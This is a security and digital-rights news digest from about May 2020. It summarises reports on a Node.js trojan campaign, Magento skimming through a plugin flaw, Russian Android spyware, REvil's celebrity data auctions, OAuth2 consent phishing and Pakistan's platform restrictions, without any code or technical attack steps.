Table of Contents

  1. Malware
    1. Fake U.S. Dept of Treasury emails spreads new Node.js malware
    2. This Service Helps Malware Authors Fix Flaws in their Code
    3. FBI warns about attacks on Magento online stores via old plugin vulnerability
  2. Politics
    1. Russian hackers tracked Ukrainian artillery units using Android implant
    2. F.B.I. Finds Links Between Pensacola Gunman and Al Qaeda
    3. YouTube Automatically Deletes Some Terms Critical of Chinese Regime
  3. Leaks
    1. Mercedes-Benz onboard logic unit (OLU) source code leaks online
  4. Ransomware
    1. REvil Ransomware found buyer for Trump data, now targeting Madonna
  5. Phishing
    1. MFA Bypass Phish Caught: OAuth2 Grants Access to User Data Without a Password
  6. Digital rights
    1. Evidence of Twitter, Periscope and Zoom restrictions in Pakistan

Malware

Fake U.S. Dept of Treasury emails spreads new Node.js malware

A new Node.js based remote access Trojan and password-stealing malware is being distributed through malicious emails pretending to be from the U.S. Department of the Treasury. This new spam campaign was discovered by Abuse.ch that says payment for a government contract was not paid due to incorrect banking information. The email then prompts the user to examine the document for any mistakes, and if they do not hear back, the money will be used of the government's Coronavirus disaster relief.

This Service Helps Malware Authors Fix Flaws in their Code

Almost daily now there is news about flaws in commercial software that lead to computers getting hacked and seeded with malware. But the reality is the most malicious software also has its share of security holes that open the door for security researchers or ne'er-do-wells to liberate or else seize control over already-hacked systems. Here's a look at one long-lived malware vulnerability testing service that is used and run by some of the Dark Web's top cybercriminals.

FBI warns about attacks on Magento online stores via old plugin vulnerability

The FBI says hackers are exploiting a three-year-old vulnerability in a Magento plugin to take over online stores and plant a malicious script that records and steals buyers' payment card data. This type of attack is known as web skimming, e-skimming, or Magecart, and the FBI previously warned about a rise in attacks in October, last year. In this recent campaign, attackers are exploiting CVE-2017-7391, a vulnerability in MAGMI (Magento Mass Import), a plugin for Magento-based online stores, the FBI said in a flash security alert sent to the US private sector at the start of the month.

Politics

Russian hackers tracked Ukrainian artillery units using Android implant

A hacking group linked to the Russian government and high-profile cyberattacks against Democrats during the U.S. presidential election likely used a malware implant on Android devices to track and target Ukrainian artillery units from late 2014 through 2016, according to a new report released Thursday. The malware was able to retrieve communications and some locational data from infected devices. Intelligence that would have likely been used to strike against the artillery in support of pro-Russian separatists fighting in eastern Ukraine, the report from cybersecurity firm CrowdStrike found. The findings are the latest to support a growing view among Western security officials and cybersecurity researchers that Russian President Vladimir Putin has increasingly relied on hacking to exert influence and attack geopolitical foes.

F.B.I. Finds Links Between Pensacola Gunman and Al-Qaeda

The gunman in last year's deadly shooting at a military base in Florida was regularly in touch with Al-Qaeda for years, including the night before the attack, the country's top law enforcement officials said on Monday. They also accused Apple of costing them valuable time by refusing to help unlock the gunman's phone. The F.B.I. found that the gunman, Second Lt. Mohammed Saeed Alshamrani, a Saudi Air Force cadet training with the American military in Pensacola, had communicated with leaders of Al-Qaeda in the Arabian Peninsula and had joined the Saudi military to carry out a "special operation," Attorney General William P. Barr said at a news conference.

YouTube Automatically Deletes Some Terms Critical of Chinese Regime

YouTube automatically deletes comments that mention some Chinese phrases commonly used to criticize the Chinese Communist Party (CCP), Chinese netizens have discovered. Comments that contain such phrases are deleted within seconds, which suggests it's the work of YouTube's algorithms. One apparently banned phrase is "gongfei" (共匪), which can be translated as "communist bandit." It seems to date back to the Chinese civil war era. Another phrase that gets deleted is "wumao" (五毛), which literally means "fifty cents" and is commonly used to describe the army of internet trolls the CCP uses to spread its propaganda online. It's rumored the trolls used to be paid around 50 cents per post.

Leaks

Mercedes-Benz onboard logic unit (OLU) source code leaks online

The source code for "smart car" components installed in Mercedes-Benz vans has been leaked online over the weekend, ZDNet has learned. The leak occurred after Till Kottmann, a Swiss-based software engineer, discovered a Git web portal belonging to Daimler AG, the German automotive company behind the Mercedes-Benz car brand. Kottmann told ZDNet that he was able to register an account on Daimler's code-hosting portal, and then download more than 580 Git repositories containing the source code of onboard logic units (OLUs) installed in Mercedes vans.

Ransomware

REvil Ransomware found buyer for Trump data, now targeting Madonna

The REvil ransomware group claims to have buyers ready for documents containing damaging information about US‌ President Donald Trump and is preparing to auction data on international celebrity Madonna. The hackers breached the network of Grubman Shire Meiselas & Sacks (GSMLaw), a law firm representing a huge number of A-list celebrities, stealing everything they considered of value before encrypting the data. After unfruitful negotiations with the law firm, REvil, published an archive "with the most harmless information" on Donald Trump, a collection of more than 160 emails. They also said that there would be an auction every week with customer data, and they don't care who buys it as long as they get paid.

Phishing

MFA Bypass Phish Caught: OAuth2 Grants Access to User Data Without a Password

The Cofense Phishing Defense Center (PDC) uncovered a phishing tactic that leverages the OAuth2 framework and OpenID Connect (OIDC) protocol to access user data. The phish is not a typical credential harvester, and even if it was, Multi-Factor Authentication (MFA) wouldn't have helped. Instead, it attempts to trick users into granting permissions to a rogue application. This is not the first time the tactic has been observed, but it's a stark reminder that phishing isn't going to be solved by Multi-Factor Authentication. Using the lure of a Q1 bonus, the email is crafted to appear to be a normal invite to a SharePoint hosted file. The prospect of receiving an increase to their salary is an effective lure that can lead users to fall prey.

Digital rights

Evidence of Twitter, Periscope and Zoom restrictions in Pakistan

Network data from the NetBlocks internet observatory confirm that Twitter, Periscope and Zoom were restricted on multiple internet providers in Pakistan on the evening of Sunday 17 May 2020, commencing approximately 18:30 UTC and lasting over an hour. This report produced in partnership with the Digital Rights Foundation presents findings on the schedule events. It is shown that the Zoom restrictions appear technically unrelated to international issues that affected call quality earlier in the day. Further, it is shown that Twitter, Twitter's image and video servers, Twitter's streaming platform Periscope and the Zoom videoconferencing website share the same timeline of disruption, consistent with previous documented social media platform disruptions in Pakistan.